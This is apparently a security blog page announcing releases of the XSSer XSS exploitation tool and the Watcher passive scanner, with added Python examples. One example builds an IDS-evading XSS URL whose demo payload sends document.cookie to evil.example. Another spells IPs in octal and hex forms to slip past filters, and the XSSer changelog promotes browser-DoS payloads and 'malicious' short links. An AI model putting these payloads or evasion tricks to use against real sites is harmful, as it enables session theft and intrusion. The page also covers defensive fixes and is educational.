xss attack

All of you web application penetration testers, check out this release of XSSer version 0.7a, for it now has 26 new injections!

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.

These are the changes:

  • Added attack payloads to fuzzer (26 new injections).
  • Added POST connections: Now you can inject on webforms.
  • Added Statistics: reports with data about efficiency, connections, vectors, etc.
  • Added URL Shorteners: it is now possible to wrap valid results in short links. For the moment tinyurl and is.gd are supported, so your “malicious” link is ready to share!!
  • Added IP Octal: spoofing for fuzzing vectors. The remote/local IP in a vector can be written in octal instead of dotted decimal.
  • Added Post-processing payloads: once you have a valid “hole/payload”, you can tell XSSer to prepare the real code that you want to inject.
  • Added DOM Shadows: in this version this is a server-side anti-logging feature. You can inject code through the Document Object Model eval function, so that the real payload is not visible to some server-side IDSs.
  • Added Cookie injector: it is now possible to inject code into HTTP Cookie parameters automatically.
  • Added Browser DoS (Denial of Service): yes!! If you have a valid payload to inject, XSSer will prepare code for you to share with victims that “collapses” their browsers. A client-browser DoS ready to play, friend scripter!
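
The DOM Shadows item above deserves a concrete illustration of what “anti-logging” means. The following is an added example written for this page; it is not XSSer's own implementation of its DOM Shadows option, only the general technique: the reflected parameter carries a small loader that eval()s the URL fragment, and the real code lives after the `#`, which browsers never send to the server. The target/attacker hostnames, the `q` parameter and the IDS signature list are all constructed for the demo.

```python
"""
'DOM shadow' delivery of an XSS payload: the reflected parameter carries only
a small loader that eval()s the URL fragment, and the real code rides in the
fragment, which the browser never sends to the server.

Added example written for this page; it is not XSSer's implementation of its
DOM Shadows option, just the general technique. The signature list and URLs
are constructed for the demo.
"""
import re
from urllib.parse import urlsplit, urlencode, quote, unquote

# The only thing that gets reflected by the vulnerable page.
LOADER = "<script>eval(decodeURIComponent(location.hash.slice(1)))</script>"

# A toy server-side IDS: naive content signatures over the decoded request.
IDS_SIGNATURES = [r"document\.cookie", r"alert\s*\(", r"String\.fromCharCode"]


def build_direct_url(base: str, param: str, real_code: str) -> str:
    """Conventional reflected XSS: the whole payload travels in the query."""
    return "%s?%s" % (base, urlencode({param: "<script>%s</script>" % real_code}))


def build_shadow_url(base: str, param: str, real_code: str) -> str:
    """Loader in the query string, real code percent-encoded after '#'."""
    return "%s?%s#%s" % (base, urlencode({param: LOADER}), quote(real_code, safe=""))


def server_side_view(url: str) -> str:
    """The request-target the server receives: path + query, never the fragment."""
    p = urlsplit(url)
    return p.path + ("?" + p.query if p.query else "")


def client_side_code(url: str) -> str:
    """What decodeURIComponent(location.hash.slice(1)) yields in the browser."""
    return unquote(urlsplit(url).fragment)


def ids_hits(request_target: str) -> list:
    """Signatures that fire on the request as the server (or its IDS) saw it."""
    decoded = unquote(request_target)
    return [sig for sig in IDS_SIGNATURES if re.search(sig, decoded)]


if __name__ == "__main__":
    base = "http://target.example/search"
    code = "new Image().src='http://evil.example/?c='+document.cookie"
    for name, url in (("direct", build_direct_url(base, "q", code)),
                      ("shadow", build_shadow_url(base, "q", code))):
        seen = server_side_view(url)
        print("%s: server sees %s\n        IDS hits: %s" % (name, seen, ids_hits(seen)))
    print("browser evals:", client_side_code(build_shadow_url(base, "q", code)))
```

The server log and any signature-based IDS in front of it only ever see the loader, so the cookie-stealing code never appears in server-side evidence. Two caveats for practitioners: the loader string itself (`eval(`, `location.hash`) is a perfectly good signature, and a page that reflects user input unescaped is vulnerable regardless of which delivery trick is used, so the fix is output encoding on the server, not a fragment-aware IDS.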

You can download XSSer version 0.7a here.


All of you web application penetration testers, check out this release of XSSer version 0.6a, for it now has THREE new features! They are:

1. DORK: Process search engine dork results as target URLs. You can also specify the search engines that you would like to use – Scroogle, Altavista, Bing, etc.
2. CRAWLING: Crawl target hierarchy parameters. You can specify the depth.
3. Encode: Encodes fuzzing IP addresses in DWORD format.
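
The DWORD encoding listed here, and the octal encoding that arrived in 0.7a, are the same idea: spell the attacker-controlled IP in a form a naive filter does not recognise as an IP but a browser's URL parser still resolves. The block below is an added example written for this page, not XSSer's own code: `encode_ip()` produces the DWORD, octal and hex spellings, and `decode_host()` parses them back the way a WHATWG-style URL parser does, so each fuzzing vector can be checked against the host it should reach.

```python
"""
Alternative spellings of an IPv4 address that browsers and many HTTP
libraries still resolve to the same host: DWORD, octal and hex forms.

Added example for this page (not XSSer's own code): encode_ip() produces
the fuzzing forms, decode_host() parses them back the way a URL parser
does, so you can confirm each vector still points where you expect.
"""
import ipaddress


def ip_to_int(ip: str) -> int:
    """127.0.0.1 -> 2130706433 (network byte order)."""
    return int(ipaddress.IPv4Address(ip))


def encode_ip(ip: str) -> dict:
    """Return several syntactically different spellings of the same host.

    A filter that blocks the literal dotted-decimal string, or that only
    recognises 'looks like an IP' patterns, lets these through.
    """
    octets = [int(o) for o in ip.split(".")]
    n = ip_to_int(ip)
    return {
        "dotted": ip,
        "dword": str(n),                                      # 2130706433
        "octal": ".".join("0%o" % o for o in octets),         # 0177.00.00.01
        "hex": "0x%08x" % n,                                  # 0x7f000001
        "dotted_hex": ".".join("0x%02x" % o for o in octets),
    }


def decode_host(host: str) -> str:
    """Parse any of the forms above to canonical dotted decimal.

    Follows the WHATWG URL 'IPv4 parser' rules: a leading 0x means hex,
    a leading 0 means octal, and the last part fills all remaining bytes
    (so '127.1' is 127.0.0.1). Raises ValueError on anything else.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or "" in parts:
        raise ValueError("not an IPv4 number: %r" % host)
    nums = []
    for part in parts:
        if part[:2].lower() == "0x":
            nums.append(int(part[2:] or "0", 16))
        elif len(part) > 1 and part[0] == "0":
            nums.append(int(part[1:], 8))
        else:
            nums.append(int(part, 10))
    last = nums.pop()
    if any(v > 255 for v in nums) or last >= 256 ** (4 - len(nums)):
        raise ValueError("IPv4 part out of range: %r" % host)
    value = last
    for i, v in enumerate(nums):
        value += v << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))


if __name__ == "__main__":
    for name, form in encode_ip("127.0.0.1").items():
        print("%-10s %-22s -> %s" % (name, form, decode_host(form)))
```

Mixed forms such as `0xC0.0250.1.10` are also valid, and the short form `127.1` resolves to `127.0.0.1`. The defensive lesson is the mirror image: an allow-list or block-list that compares URL hosts as strings must canonicalise them through the same parser first.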

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.

So as you can see, this version adds dorking and crawling support with IP DWORD encoding. Also, the core code has been cleaned a bit.

You can download XSSer version 0.6a here.


You can find our original post about Watcher here. Now, Casaba Security, the company responsible for this open source project has released an updated version – Watcher version 1.4.0!

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it only inspects the traffic your browser already generates and sends no requests of its own, so it won’t damage production systems and is safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. It provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

This is the change log for the update:

  • Check descriptions all improved and updated with recommendations and external references.
  • New check for JavaScript document.domain lowering.
  • IMPORTANT: All cookie checks now perform noise filtering by default, with no option to change.
  • New installations now come with a few noisy checks disabled by default.
  • New installations now come with some check configurations enabled by default to reduce noise.
  • Fixed bug in loosely scoped domain where it wasn’t defaulting to the origin when one isn’t specified.
  • Fixed bug where check configurations weren’t saving.
  • Assorted bug fixes.
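
The new document.domain check is worth spelling out, because “lowering” is the part that matters: a page at `app.example.com` that sets `document.domain = "example.com"` opts into same-origin scripting with every other host under `example.com` that does the same, which is exactly the kind of thing a passive tool can spot in a captured response. The block below is an added example written for this page, not Casaba's code, showing how such a check can be run over response bodies; the sample responses are constructed, and the rule used to approximate a public suffix (the assigned value must contain at least one dot) is a stated simplification.

```python
"""
Passive check for document.domain lowering, in the spirit of Watcher's new
check. Added example written for this page, not Casaba's code: it scans a
captured response body for document.domain assignments and flags the ones
that widen the page's origin to a parent domain.
"""
import re
from urllib.parse import urlsplit

# Assignment of a string literal to document.domain, in inline or external JS.
DOMAIN_ASSIGN = re.compile(r"""document\.domain\s*=\s*["']([^"']+)["']""")


def is_lowering(page_host: str, assigned: str) -> bool:
    """True when `assigned` is a proper parent of `page_host`.

    Setting document.domain to a parent domain lets every other host under
    that parent that does the same thing script this page's DOM. Setting it
    to the page's own host is a no-op here, and a bare public suffix such as
    'com' is refused by browsers; this example approximates 'public suffix'
    with 'contains at least one dot' (an assumption; a real check should use
    the public suffix list).
    """
    page_host = page_host.lower().rstrip(".")
    assigned = assigned.lower().strip(".")
    if assigned == page_host or "." not in assigned:
        return False
    return page_host.endswith("." + assigned)


def check_response(url: str, body: str) -> list:
    """Run the check over one response; returns one finding per lowering."""
    host = urlsplit(url).hostname or ""
    findings = []
    for m in DOMAIN_ASSIGN.finditer(body):
        target = m.group(1)
        if is_lowering(host, target):
            findings.append({"url": url, "host": host, "domain": target})
    return findings


# Constructed sample traffic (not real captures).
SAMPLE_RESPONSES = [
    ("https://app.example.com/dashboard",
     '<html><script>document.domain = "example.com";</script></html>'),
    ("https://www.example.com/",
     "<script>document.domain='www.example.com';</script>"),        # no-op
    ("https://cdn.example.net/widget.js",
     'try { document.domain = "com"; } catch (e) {}'),                # refused by browser
]


def run_samples() -> list:
    """Apply check_response() to every constructed sample and collect findings."""
    findings = []
    for url, body in SAMPLE_RESPONSES:
        findings.extend(check_response(url, body))
    return findings


if __name__ == "__main__":
    for f in run_samples():
        print("document.domain lowered at %(url)s: %(host)s -> %(domain)s" % f)
```

Only the first sample is reported: the second sets document.domain to the page's own host, and the third tries to drop to a public suffix, which browsers reject. A string-literal regex misses assignments built at runtime (`document.domain = parts.slice(-2).join(".")`), so treat a clean result as “nothing obvious”, not as proof.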

Download Watcher version 1.4.0 here.
